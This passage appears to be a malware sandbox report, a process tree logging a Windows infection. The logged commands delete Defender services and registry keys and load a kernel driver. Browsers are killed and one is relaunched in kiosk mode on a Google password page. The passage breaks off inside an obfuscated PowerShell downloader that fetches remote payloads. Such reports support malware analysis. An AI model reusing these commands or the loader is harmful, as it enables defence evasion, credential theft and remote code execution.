                  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F992.tmp\F993.tmp\F994.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"
                  7⤵
                  • Drops file in Program Files directory
                  PID:2352
                  • C:\Windows\system32\sc.exe
                    sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                    8⤵
                    • Launches sc.exe
                    PID:3592
                  • C:\Windows\system32\sc.exe
                    sc start ddrver
                    8⤵
                    • Launches sc.exe
                    PID:3428
                  • C:\Windows\system32\timeout.exe
                    timeout /t 1
                    8⤵
                    • Delays execution with timeout.exe
                    PID:4364
                  • C:\Windows\system32\sc.exe
                    sc stop ddrver
                    8⤵
                    • Launches sc.exe
                    PID:2364
                  • C:\Windows\system32\sc.exe
                    sc start ddrver
                    8⤵
                    • Launches sc.exe
                    PID:3576
                  • C:\Windows\system32\takeown.exe
                    takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                    8⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:3232
                  • C:\Windows\system32\icacls.exe
                    icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                    8⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:4116
                  • C:\Windows\system32\sc.exe
                    sc stop "WinDefend"
                    8⤵
                    • Launches sc.exe
                    PID:2084
                  • C:\Windows\system32\sc.exe
                    sc delete "WinDefend"
                    8⤵
                    • Launches sc.exe
                    PID:1896
                  • C:\Windows\system32\reg.exe
                    reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                    8⤵
                      PID:2932
                    • C:\Windows\system32\sc.exe
                      sc stop "MDCoreSvc"
                      8⤵
                      • Launches sc.exe
                      PID:4612
                    • C:\Windows\system32\sc.exe
                      sc delete "MDCoreSvc"
                      8⤵
                      • Launches sc.exe
                      PID:2152
                    • C:\Windows\system32\reg.exe
                      reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                      8⤵
                        PID:2792
                      • C:\Windows\system32\sc.exe
                        sc stop "WdNisSvc"
                        8⤵
                        • Launches sc.exe
                        PID:3184
                      • C:\Windows\system32\sc.exe
                        sc delete "WdNisSvc"
                        8⤵
                        • Launches sc.exe
                        PID:5064
                      • C:\Windows\system32\reg.exe
                        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                        8⤵
                          PID:4936
                        • C:\Windows\system32\sc.exe
                          sc stop "Sense"
                          8⤵
                          • Launches sc.exe
                          PID:3708
                        • C:\Windows\system32\sc.exe
                          sc delete "Sense"
                          8⤵
                          • Launches sc.exe
                          PID:2696
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                          8⤵
                            PID:3172
                          • C:\Windows\system32\sc.exe
                            sc stop "wscsvc"
                            8⤵
                            • Launches sc.exe
                            PID:4652
                          • C:\Windows\system32\sc.exe
                            sc delete "wscsvc"
                            8⤵
                            • Launches sc.exe
                            PID:4840
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                            8⤵
                            • Modifies security service
                            PID:2776
                          • C:\Windows\system32\sc.exe
                            sc stop "SgrmBroker"
                            8⤵
                            • Launches sc.exe
                            PID:5044
                          • C:\Windows\system32\sc.exe
                            sc delete "SgrmBroker"
                            8⤵
                            • Launches sc.exe
                            PID:224
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                            8⤵
                              PID:4792
                            • C:\Windows\system32\sc.exe
                              sc stop "SecurityHealthService"
                              8⤵
                              • Launches sc.exe
                              PID:3640
                            • C:\Windows\system32\sc.exe
                              sc delete "SecurityHealthService"
                              8⤵
                              • Launches sc.exe
                              PID:3660
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                              8⤵
                                PID:3196
                              • C:\Windows\system32\sc.exe
                                sc stop "webthreatdefsvc"
                                8⤵
                                • Launches sc.exe
                                PID:816
                              • C:\Windows\system32\sc.exe
                                sc delete "webthreatdefsvc"
                                8⤵
                                • Launches sc.exe
                                PID:4312
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                8⤵
                                  PID:2592
                                • C:\Windows\system32\sc.exe
                                  sc stop "webthreatdefusersvc"
                                  8⤵
                                  • Launches sc.exe
                                  PID:2580
                                • C:\Windows\system32\sc.exe
                                  sc delete "webthreatdefusersvc"
                                  8⤵
                                  • Launches sc.exe
                                  PID:3424
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                  8⤵
                                    PID:3356
                                  • C:\Windows\system32\sc.exe
                                    sc stop "WdNisDrv"
                                    8⤵
                                    • Launches sc.exe
                                    PID:1192
                                  • C:\Windows\system32\sc.exe
                                    sc delete "WdNisDrv"
                                    8⤵
                                    • Launches sc.exe
                                    PID:3096
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                    8⤵
                                      PID:4608
                                    • C:\Windows\system32\sc.exe
                                      sc stop "WdBoot"
                                      8⤵
                                      • Launches sc.exe
                                      PID:3860
                                    • C:\Windows\system32\sc.exe
                                      sc delete "WdBoot"
                                      8⤵
                                      • Launches sc.exe
                                      PID:1008
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                      8⤵
                                        PID:3312
                                      • C:\Windows\system32\sc.exe
                                        sc stop "WdFilter"
                                        8⤵
                                        • Launches sc.exe
                                        PID:2440
                                      • C:\Windows\system32\sc.exe
                                        sc delete "WdFilter"
                                        8⤵
                                        • Launches sc.exe
                                        PID:3460
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                        8⤵
                                          PID:60
                                        • C:\Windows\system32\sc.exe
                                          sc stop "SgrmAgent"
                                          8⤵
                                          • Launches sc.exe
                                          PID:4520
                                        • C:\Windows\system32\sc.exe
                                          sc delete "SgrmAgent"
                                          8⤵
                                          • Launches sc.exe
                                          PID:2884
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                          8⤵
                                            PID:624
                                          • C:\Windows\system32\sc.exe
                                            sc stop "MsSecWfp"
                                            8⤵
                                            • Launches sc.exe
                                            PID:920
                                          • C:\Windows\system32\sc.exe
                                            sc delete "MsSecWfp"
                                            8⤵
                                            • Launches sc.exe
                                            PID:5040
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                            8⤵
                                              PID:4916
                                            • C:\Windows\system32\sc.exe
                                              sc stop "MsSecFlt"
                                              8⤵
                                              • Launches sc.exe
                                              PID:4392
                                            • C:\Windows\system32\sc.exe
                                              sc delete "MsSecFlt"
                                              8⤵
                                              • Launches sc.exe
                                              PID:2256
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                              8⤵
                                                PID:1236
                                              • C:\Windows\system32\sc.exe
                                                sc stop "MsSecCore"
                                                8⤵
                                                • Launches sc.exe
                                                PID:3272
                                              • C:\Windows\system32\sc.exe
                                                sc delete "MsSecCore"
                                                8⤵
                                                • Launches sc.exe
                                                PID:2552
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                8⤵
                                                  PID:4008
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                  8⤵
                                                    PID:2156
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                    8⤵
                                                      PID:4664
                                                    • C:\Windows\system32\schtasks.exe
                                                      schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                      8⤵
                                                        PID:3732
                                                      • C:\Windows\system32\schtasks.exe
                                                        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                        8⤵
                                                          PID:3592
                                                        • C:\Windows\system32\sc.exe
                                                          sc stop ddrver
                                                          8⤵
                                                          • Launches sc.exe
                                                          PID:3876
                                                        • C:\Windows\system32\sc.exe
                                                          sc delete ddrver
                                                          8⤵
                                                          • Launches sc.exe
                                                          PID:3644
                                              • C:\Users\Admin\AppData\Local\Temp\10338710101\32419d60a4.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10338710101\32419d60a4.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:3168
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:1236
                                              • C:\Users\Admin\AppData\Local\Temp\10338720101\d0e74db0d7.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10338720101\d0e74db0d7.exe"
                                                3⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Executes dropped EXE
                                                • Identifies Wine through registry keys
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:2216
                                              • C:\Users\Admin\AppData\Local\Temp\10338730101\234373e26c.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10338730101\234373e26c.exe"
                                                3⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Executes dropped EXE
                                                • Identifies Wine through registry keys
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:3192
                                              • C:\Users\Admin\AppData\Local\Temp\10338740101\811a208ce2.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10338740101\811a208ce2.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of FindShellTrayWindow
                                                • Suspicious use of SendNotifyMessage
                                                PID:3096
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /F /IM firefox.exe /T
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1192
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /F /IM chrome.exe /T
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3888
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /F /IM msedge.exe /T
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3148
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /F /IM opera.exe /T
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1896
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /F /IM brave.exe /T
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5008
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                  4⤵
                                                    PID:5088
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                      5⤵
                                                      • Drops desktop.ini file(s)
                                                      • Checks processor information in registry
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      • Suspicious use of FindShellTrayWindow
                                                      • Suspicious use of SendNotifyMessage
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:4616
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2008 -prefsLen 27099 -prefMapHandle 2012 -prefMapSize 270279 -ipcHandle 2088 -initialChannelId {6bdc9991-6b78-4fbb-9732-d4e4baf84ff9} -parentPid 4616 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4616" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                        6⤵
                                                          PID:3560
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2492 -prefsLen 27135 -prefMapHandle 2496 -prefMapSize 270279 -ipcHandle 2504 -initialChannelId {86822082-061a-495e-852b-5536c7a93fe8} -parentPid 4616 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4616" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                          6⤵
                                                            PID:2720
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3820 -prefsLen 25164 -prefMapHandle 3824 -prefMapSize 270279 -jsInitHandle 3828 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3836 -initialChannelId {7e900dda-74b1-4a60-8f24-1992354a557a} -parentPid 4616 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4616" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                            6⤵
                                                            • Checks processor information in registry
                                                            PID:4472
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3988 -prefsLen 27276 -prefMapHandle 3992 -prefMapSize 270279 -ipcHandle 4080 -initialChannelId {05416963-be72-4fbb-aba3-579344ca4b4d} -parentPid 4616 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4616" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                            6⤵
                                                              PID:4916
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3292 -prefsLen 34775 -prefMapHandle 3128 -prefMapSize 270279 -jsInitHandle 3240 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 1628 -initialChannelId {c99637b2-d31f-475c-a13c-fb84e10633c2} -parentPid 4616 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4616" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                              6⤵
                                                              • Checks processor information in registry
                                                              PID:5080
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5056 -prefsLen 35012 -prefMapHandle 2892 -prefMapSize 270279 -ipcHandle 5100 -initialChannelId {6e6547f4-7e4a-422e-8102-771e0082210a} -parentPid 4616 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4616" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                              6⤵
                                                              • Checks processor information in registry
                                                              PID:6124
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5336 -prefsLen 32952 -prefMapHandle 5340 -prefMapSize 270279 -jsInitHandle 5344 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5352 -initialChannelId {4d297043-874a-45d1-8d65-3c84f7b01879} -parentPid 4616 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4616" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                              6⤵
                                                              • Checks processor information in registry
                                                              PID:1316
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5548 -prefsLen 32952 -prefMapHandle 5552 -prefMapSize 270279 -jsInitHandle 5556 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5564 -initialChannelId {66076f4e-65ae-4214-8166-4f56f6366fe3} -parentPid 4616 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4616" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                              6⤵
                                                              • Checks processor information in registry
                                                              PID:2612
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5756 -prefsLen 32952 -prefMapHandle 5760 -prefMapSize 270279 -jsInitHandle 5764 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5772 -initialChannelId {4d844df5-7dfb-4067-bb36-ef381023b3a2} -parentPid 4616 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4616" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                              6⤵
                                                              • Checks processor information in registry
                                                              PID:5208
                                                      • C:\Users\Admin\AppData\Local\Temp\10338750101\9dd74dd36a.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10338750101\9dd74dd36a.exe"
                                                        3⤵
                                                        • Modifies Windows Defender DisableAntiSpyware settings
                                                        • Modifies Windows Defender Real-time Protection settings
                                                        • Modifies Windows Defender TamperProtection settings
                                                        • Modifies Windows Defender notification settings
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Windows security modification
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:6020
                                                      • C:\Users\Admin\AppData\Local\Temp\10338760101\Q1DOy22.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10338760101\Q1DOy22.exe"
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • Adds Run key to start application
                                                        PID:5956
                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                          cmd.exe /c 67e2ff36de8a3.vbs
                                                          4⤵
                                                          • Checks computer location settings
                                                          • Modifies registry class
                                                          PID:5904
                                                          • C:\Windows\System32\WScript.exe
                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e2ff36de8a3.vbs"
                                                            5⤵
                                                            • Checks computer location settings
                                                            PID:5824
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@H